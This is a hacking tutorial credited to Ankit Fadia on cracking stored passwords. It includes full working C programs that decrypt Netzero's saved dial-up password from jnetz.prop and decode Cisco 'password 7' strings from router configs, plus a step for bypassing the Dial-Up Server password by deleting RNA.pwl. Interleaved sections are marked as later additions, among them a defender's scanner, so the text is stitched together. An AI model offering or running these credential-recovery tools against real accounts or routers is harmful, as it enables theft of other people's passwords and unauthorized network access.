BEST HACKING TIPS BY ANKIT FADIA
Welcome to another edition of Password Cracking Decrypted. In this tutorial we will learn, you guessed it, how to crack passwords. This edition explains how to crack more kinds of passwords.
Although this tutorial is quite easy to understand, I would definitely like to make one suggestion. To really enjoy reading this manual, you need to know C relatively well. However, even if you have no idea what C is, I assure you that this tutorial will definitely be of use to you.
Cracking the Netzero (Free ISP) Dial Up Password
Today, the number of Internet Service Providers (both free and the not so free ones) has reached a very high figure. All of them aim at providing better services and making the process of connecting to the Internet easier for the user. One common practice amongst both Internet Service Providers and popular browsers like Internet Explorer is to offer an option called 'Save Password', which makes life easier for the user, as it allows the user to not type in the password each time he has to connect to the Internet.
However, as with all other software, as soon as the developer tries to add a user-friendly feature or make the software easier to use or more efficient, he has to make at least some compromise in the safety or security field. One popular example would be Outlook Express: ever since the Preview Pane was introduced within the email client, Outlook Express users have become prone to email-borne viruses.
Anyway, getting back to the subject of this tutorial, even including the 'Save Password' feature has made the user's password unsafe. What happens is that, when you check this option or enable it, the concerned software (browser or Internet Service Provider software) takes the password and passes it through an algorithm to encrypt it. Once the password is encrypted, it is stored in the Windows Registry or in some .ini or .dat or similar file. This system sounds quite safe; however, if you look deeper, you find that it is trouble waiting to happen.
The very fact that the encrypted password has to be stored somewhere makes this feature vulnerable. Also, almost all software providing this feature does not use a strong algorithm. This makes the work of a hacker very easy. Some software even stores the password as plaintext in the registry!!! So, basically the weakest link in this feature is that most software developers are unaware of the fact that the encrypted password can be easily decrypted, once we study the software inside out. So, what I mean to say is that using this feature certainly makes life easy for those of you who cannot remember passwords, but it does leave your Internet account vulnerable. However, if you are one of those people who needs to write down your password on a piece of paper and stick it to the front of your monitor, then this feature is definitely for you.
So how do I crack the Netzero Dial Up Password?
NOTE: The following information first appeared at L0pht.com. I only rewrote it and made it more understandable.
Anyway, Netzero is a free ISP, which asks only for an advertising bar in return for Internet access. It too provides this 'Save Password' feature; however, like most services, it uses an extremely weak algorithm to encrypt the password. The following process of decryption works on Netzero version 3.0 and earlier and requires Win 9x, NT or Win 2K to be running.
For this exploit, you need to have local access to the machine which has the Netzero software installed.
This vulnerability cannot be exploited unless and until you get the required file; for that you either have to have local access or need to devise a method of getting the file which contains the password.
The Netzero username and password are stored in an ASCII file named id.dat, which is located in the Netzero directory. If the user has enabled the 'Save Password' option, then the username and password are also stored in the jnetz.prop file. The passwords stored in both these files are encrypted using a very easy to crack algorithm. Although the algorithms used to produce the encrypted information (to be stored in the two files) are not the same, they are derived from the same main algorithm. The two algorithms differ only very slightly. In this tutorial we will see how this weak algorithm can be exploited.
The Netzero password is encrypted using a substitution cipher system. The cipher system used is a typical example of a 1 to 1 mapping between characters where each single plaintext character is replaced by a single encrypted character.
Are you lost? Well, to understand better, read on.
Say the Netzero application is running, and the user clicks on the 'Save Password' option and types his password in the required field. What happens then is that the Netzero application loads the encrypting file, which contains the plaintext to cipher-text database, into memory. Now, for example, if your password is xyz and it is stored in location 'm' of the memory and the corresponding encrypted password abc is stored in location 'n' of the memory, then the password xyz is actually stored as abc.
Well it is quite simple, right? Well, almost. The part of the encryption algorithm used by Netzero which is difficult to understand is that two encrypted characters replace each character of the plaintext password. These two encrypted characters, which replace a single plaintext character, are however not stored together.
When substituting character x stored in position i of a password 'n' characters long, the first encrypted character would be stored in 'i' and the next in 'n+i'.
The two encrypted characters are derived from the following table:
  | 1  a  M  Q  f  7  g  T  9  4  L  W  e  6  y  C
--+-----------------------------------------------
g | `  a  b  c  d  e  f  g  h  i  j  k  l  m  n  o
T | p  q  r  s  t  u  v  w  x  y  z  {  |  }  ~
f | @  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O
7 | P  Q  R  S  T  U  V  W  X  Y  Z  [  \  ]  ^  _
Q | 0  1  2  3  4  5  6  7  8  9  :  ;  <  =  >  ?
M | SP !  "  #  $  %  &  '  (  )  *  +  ,  -  .  /
NOTE: SP represents a single space and the above chart represents ASCII characters.
To encrypt a string of length 'n', we need to find each character in the above table and place its column header into position i and its row header into position n+i.
For example:
E(a) = ag
E(aa) = aagg
E(aqAQ1!) = aaaaaagTf7QM
E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg
On the other hand, while decrypting a password of length 2n, character i will be the element in the above table where the column headed by character i and the row headed by character n+i intersect.
For example:
D(af) = A
D(aaff) = AA
D(aaMMQQfgfgfg) = AaBbCc
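The encoding rule above, written out as an added example (it is not part of the original tutorial or of the L0pht material). It relies on an observation about the table: the column header string also supplies the row labels, so each output character is one nibble of the ASCII code looked up in a single fixed 16-character alphabet, with no key involved. The names `NZ_ALPHA`, `nz_encode` and `nz_matches` are chosen here.

```c
#include <stdio.h>
#include <string.h>

/* Column header of the table; entries 2..7 are also its row labels (M Q f 7 g T). */
static const char NZ_ALPHA[] = "1aMQf7gT94LWe6yC";

/* Encode printable ASCII (0x20..0x7e) as described above: the column
 * header of character i goes to out[i], the row header to out[n+i].
 * out needs 2*strlen(plain)+1 bytes. Returns 0 on success, -1 otherwise. */
int nz_encode(const char *plain, char *out, size_t out_size)
{
    size_t n = strlen(plain), i;

    if (out_size < 2 * n + 1)
        return -1;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)plain[i];
        if (c < 0x20 || c > 0x7e)
            return -1;                     /* character not in the table */
        out[i]     = NZ_ALPHA[c & 0x0f];   /* low nibble  -> column header */
        out[n + i] = NZ_ALPHA[c >> 4];     /* high nibble -> row header    */
    }
    out[2 * n] = '\0';
    return 0;
}

/* 1 if plain encodes to exactly expected, else 0. */
int nz_matches(const char *plain, const char *expected)
{
    char buf[129];
    return nz_encode(plain, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

int main(void)
{
    /* The worked examples from the text above. */
    printf("%d %d %d\n", nz_matches("a", "ag"), nz_matches("aa", "aagg"),
           nz_matches("aqAQ1!", "aaaaaagTf7QM"));
    return 0;
}
```

Because the mapping is fixed and keyless, the same password always produces the same stored string, so the only protection the saved value has is the access control on the file itself.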
Decrypting the password manually would be quite fun, but would definitely be a very time consuming process. Anyhow, I do suggest you try to decrypt the Netzero password manually at least once. For those of you who do not enjoy decrypting passwords manually, I also have a C program which will do it for you.
The following C program demonstrates how the Netzero password is decrypted. Simply compile and execute it in the directory in which the jnetz.prop file exists.
___________________________________________________________
#include <stdio.h>
#include <string.h>

#define UID_SIZE 64
#define PASS_CIPHER_SIZE 128
#define PASS_PLAIN_SIZE 64
#define BUF_SIZE 256

/* Rows are selected by the second-half character of the cipher text,
   columns by the first-half character (see the table above). */
const char decTable[6][16] = {
    {'`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'},
    {'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~',0},
    {'@','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O'},
    {'P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_'},
    {'0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?'},
    {' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/'}
};

/* Decrypt cCipherPass (2n characters) into cPlainPass (n characters).
   Returns 0 on success, 1 on error. */
int nz_decrypt(char cCipherPass[PASS_CIPHER_SIZE],
               char cPlainPass[PASS_PLAIN_SIZE])
{
    int passLen, i, idx1, idx2;

    passLen = strlen(cCipherPass) / 2;
    if (passLen >= PASS_PLAIN_SIZE)   /* leave room for the terminating 0 */
    {
        printf("Error: Plain text array too small\n");
        return 1;
    }
    for (i = 0; i < passLen; i++)
    {
        /* Column index: character i of the first half */
        switch (cCipherPass[i])
        {
        case '1': idx2 = 0; break;
        case 'a': idx2 = 1; break;
        case 'M': idx2 = 2; break;
        case 'Q': idx2 = 3; break;
        case 'f': idx2 = 4; break;
        case '7': idx2 = 5; break;
        case 'g': idx2 = 6; break;
        case 'T': idx2 = 7; break;
        case '9': idx2 = 8; break;
        case '4': idx2 = 9; break;
        case 'L': idx2 = 10; break;
        case 'W': idx2 = 11; break;
        case 'e': idx2 = 12; break;
        case '6': idx2 = 13; break;
        case 'y': idx2 = 14; break;
        case 'C': idx2 = 15; break;
        default:
            printf("Error: Unknown Cipher Text index: %c\n", cCipherPass[i]);
            return 1;
        }
        /* Row index: character i of the second half */
        switch (cCipherPass[i + passLen])
        {
        case 'g': idx1 = 0; break;
        case 'T': idx1 = 1; break;
        case 'f': idx1 = 2; break;
        case '7': idx1 = 3; break;
        case 'Q': idx1 = 4; break;
        case 'M': idx1 = 5; break;
        default:
            printf("Error: Unknown Cipher Text Set: %c\n",
                   cCipherPass[i + passLen]);
            return 1;
        }
        cPlainPass[i] = decTable[idx1][idx2];
    }
    cPlainPass[i] = 0;
    return 0;
}

int main(void)
{
    FILE *hParams;
    char cBuffer[BUF_SIZE], cUID[UID_SIZE];
    char cCipherPass[PASS_CIPHER_SIZE], cPlainPass[PASS_PLAIN_SIZE];
    int done = 2;

    printf("\nNet Zero Password Decryptor\n");
    printf("Brian Carrier [bcarrier@atstake.com]\n");
    printf("@Stake L0pht Research Labs\n");
    printf("http://www.atstake.com\n\n");
    if ((hParams = fopen("jnetz.prop", "r")) == NULL)
    {
        printf("Unable to find jnetz.prop file\n");
        return 1;
    }
    while ((fgets(cBuffer, BUF_SIZE, hParams) != NULL) && (done > 0))
    {
        if (strncmp(cBuffer, "ProfUID=", 8) == 0)
        {
            done--;
            strncpy(cUID, cBuffer + 8, UID_SIZE - 1);
            cUID[UID_SIZE - 1] = 0;   /* strncpy may not terminate */
            printf("UserID: %s", cUID);
        }
        if (strncmp(cBuffer, "ProfPWD=", 8) == 0)
        {
            done--;
            strncpy(cCipherPass, cBuffer + 8, PASS_CIPHER_SIZE - 1);
            cCipherPass[PASS_CIPHER_SIZE - 1] = 0;
            /* Drop the line ending so it is not counted in the length */
            cCipherPass[strcspn(cCipherPass, "\r\n")] = 0;
            printf("Encrypted Password: %s\n", cCipherPass);
            if (nz_decrypt(cCipherPass, cPlainPass) != 0)
                return 1;
            else
                printf("Plain Text Password: %s\n", cPlainPass);
        }
    }
    fclose(hParams);
    if (done > 0)
    {
        printf("Invalid jnetz.prop file\n");
        return 1;
    } else {
        return 0;
    }
}
________________________________________________________________
**********************
HACKING TRUTH: By default Windows accepts both short and long passwords as the Windows login password. Some users use extremely short passwords, which can easily be brute forced. So in order to set the minimum number of characters or the minimum length of the password, simply follow this registry trick:
- Launch the Windows Registry Editor i.e. c:\windows\regedit.exe
- Scroll down to the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network
- Click on Edit > New DWORD Value.
- Name this new DWORD value MinPwdLen and in the data field, enter the minimum number of characters the password has to have. One thing to note here is that this value is in hexadecimal.
- Now, press F5 and your system just became a tiny bit securer but certainly not unhackable.
***********************
Cracking CISCO Router Passwords
Cisco router hacking is considered to be extra elite and really kewl. It is really a great exercise for your gray cells, especially if the target system has Kerberos, a firewall and some other network security software installed. Anyway, almost always the main motive behind getting root on a system is to get the password file. Once you get the router password file, you need to be able to decrypt the encrypted passwords stored in it. Well, in this section, we will learn just that.
The following is a C program which demonstrates how to decrypt a CISCO password.
_______________________________
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

char xlat[] = {
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
    0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
    0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;

/* Decode enc_pw into dec_pw. Returns 0 on success, -1 on malformed input. */
int cdecrypt(char *enc_pw, char *dec_pw)
{
    unsigned int seed, i, val = 0;

    if (strlen(enc_pw) < 2 || (strlen(enc_pw) & 1))
        return (-1);
    /* The first two decimal digits select the starting offset into xlat */
    seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
    if (seed > 15 || !isdigit((unsigned char)enc_pw[0]) ||
        !isdigit((unsigned char)enc_pw[1]))
        return (-1);
    for (i = 2; i <= strlen(enc_pw); i++) {
        if (i != 2 && !(i & 1)) {
            if (seed >= sizeof(xlat))   /* do not read past the table */
                return (-1);
            dec_pw[i / 2 - 2] = val ^ xlat[seed++];
            val = 0;
        }
        val *= 16;
        if (isdigit((unsigned char)(enc_pw[i] = toupper((unsigned char)enc_pw[i])))) {
            val += enc_pw[i] - '0';
            continue;
        }
        if (enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
            val += enc_pw[i] - 'A' + 10;
            continue;
        }
        if (strlen(enc_pw) != i)
            return (-1);
    }
    dec_pw[i / 2 - 1] = 0;   /* terminate right after the last decoded character */
    return (0);
}

int usage(void)
{
    fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
    fprintf(stdout, "       %s <router config file> <output file>\n", pname);
    return (0);
}

int main(int argc, char **argv)
{
    FILE *in = stdin, *out = stdout;
    char line[257];
    char passwd[65];
    unsigned int i, pw_pos;

    pname = argv[0];
    if (argc > 1)
    {
        if (argc > 3) {
            usage();
            exit(1);
        }
        if (argv[1][0] == '-')
        {
            switch (argv[1][1]) {
            case 'h':
                usage();
                break;
            case 'p':
                if (argc < 3) {   /* -p needs the encrypted string */
                    usage();
                    exit(1);
                }
                if (cdecrypt(argv[2], passwd)) {
                    fprintf(stderr, "Error.\n");
                    exit(1);
                }
                fprintf(stdout, "password: %s\n", passwd);
                break;
            default:
                fprintf(stderr, "%s: unknow option.", pname);
            }
            return (0);
        }
        if ((in = fopen(argv[1], "rt")) == NULL)
            exit(1);
        if (argc > 2)
            if ((out = fopen(argv[2], "wt")) == NULL)
                exit(1);
    }
    while (1) {
        /* Read one line, dropping carriage returns */
        for (i = 0; i < 256; i++) {
            int c = fgetc(in);   /* int, so EOF is distinguishable from data */
            if (c == EOF) {
                if (i)
                    break;
                fclose(in);
                fclose(out);
                return (0);
            }
            line[i] = c;
            if (c == '\r') {
                i--;
                continue;
            }
            if (c == '\n')
                break;
        }
        pw_pos = 0;
        line[i] = 0;
        if (!strncmp(line, pw_str1, strlen(pw_str1)))
            pw_pos = strlen(pw_str1);
        if (!strncmp(line, pw_str2, strlen(pw_str2)))
            pw_pos = strlen(pw_str2);
        if (!pw_pos) {
            fprintf(stdout, "%s\n", line);
            continue;
        }
        if (cdecrypt(&line[pw_pos], passwd)) {
            fprintf(stderr, "Error.\n");
            exit(1);
        }
        else {
            if (pw_pos == strlen(pw_str1))
                fprintf(out, "%s", pw_str1);
            else
                fprintf(out, "%s", pw_str2);
            fprintf(out, "%s\n", passwd);
        }
    }
}
______________________________
NOTE: The above works only on a UNIX platform. If you are running Windows, then you will have to use some brute force password cracker.
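A defender's counterpart to the program above, as an added example that is not from the original tutorial: it scans configuration lines for values stored in the reversible `password 7` form, applying the same shape checks `cdecrypt()` uses (even length, two-digit seed no greater than 15, hex digits) without decoding anything. The function names and the sample lines are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* 1 if s[0..n) has the shape cdecrypt() above accepts: a two-digit decimal
 * seed 00..15 followed by an even, non-zero number of hex digits. */
int looks_like_type7(const char *s, size_t n)
{
    size_t i;
    if (n < 4 || (n & 1) ||
        !isdigit((unsigned char)s[0]) || !isdigit((unsigned char)s[1]) ||
        (s[0] - '0') * 10 + (s[1] - '0') > 15)
        return 0;
    for (i = 2; i < n; i++)
        if (!isxdigit((unsigned char)s[i]))
            return 0;
    return 1;
}

/* 1 if the line holds "password 7 <string>" (also matches "enable-password 7 "). */
int line_has_type7(const char *line)
{
    static const char key[] = "password 7 ";
    const char *p = strstr(line, key);
    if (p == NULL) return 0;
    p += sizeof key - 1;
    return looks_like_type7(p, strcspn(p, " \t\r\n"));
}

/* Constructed sample lines; every value is a placeholder, not a credential. */
static const char *const SAMPLE[] = {
    "enable password 7 0011223344AB",
    "enable secret 5 <hash-placeholder>",
    " password 7 1500FFEE",
    " password 7 99AABB",   /* seed 99 is out of range, so not flagged */
};

int count_type7(const char *const *lines, size_t n)
{
    int hits = 0;
    while (n--)
        hits += line_has_type7(lines[n]);
    return hits;
}

int main(void)
{
    printf("reversible entries: %d\n", count_type7(SAMPLE, sizeof SAMPLE / sizeof SAMPLE[0]));
    return 0;
}
```

Entries flagged this way should be treated as effectively cleartext and moved to a one-way hashed form such as `enable secret`.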
Bypassing the Dial Up Server Password
Those of you who have used File Sharing must certainly have heard about the Dial Up Server software or utility. This too can be password protected. Now, say you have password protected the Dial Up Server, and have forgotten the password or someone has changed it; then no one can dial into your system. What do you do?
Like all password protection features in Win 9x systems, this too can easily be bypassed or changed. You do not need to know the previous old password to perform this hack. Simply delete the RNA.pwl file in the c:\windows directory and the next time you use Dial Up Server, you will find that it will either ask you to enter a new password or simply not ask for a password at all.
Well, that is all for now. I will update this tutorial explaining how to crack more passwords very very soon, so hang in there.
Ankit Fadia
To receive tutorials on everything you dreamt of, written by Ankit Fadia, join his mailing list by sending an email to: programmingforhackers-subscribe@egroups.com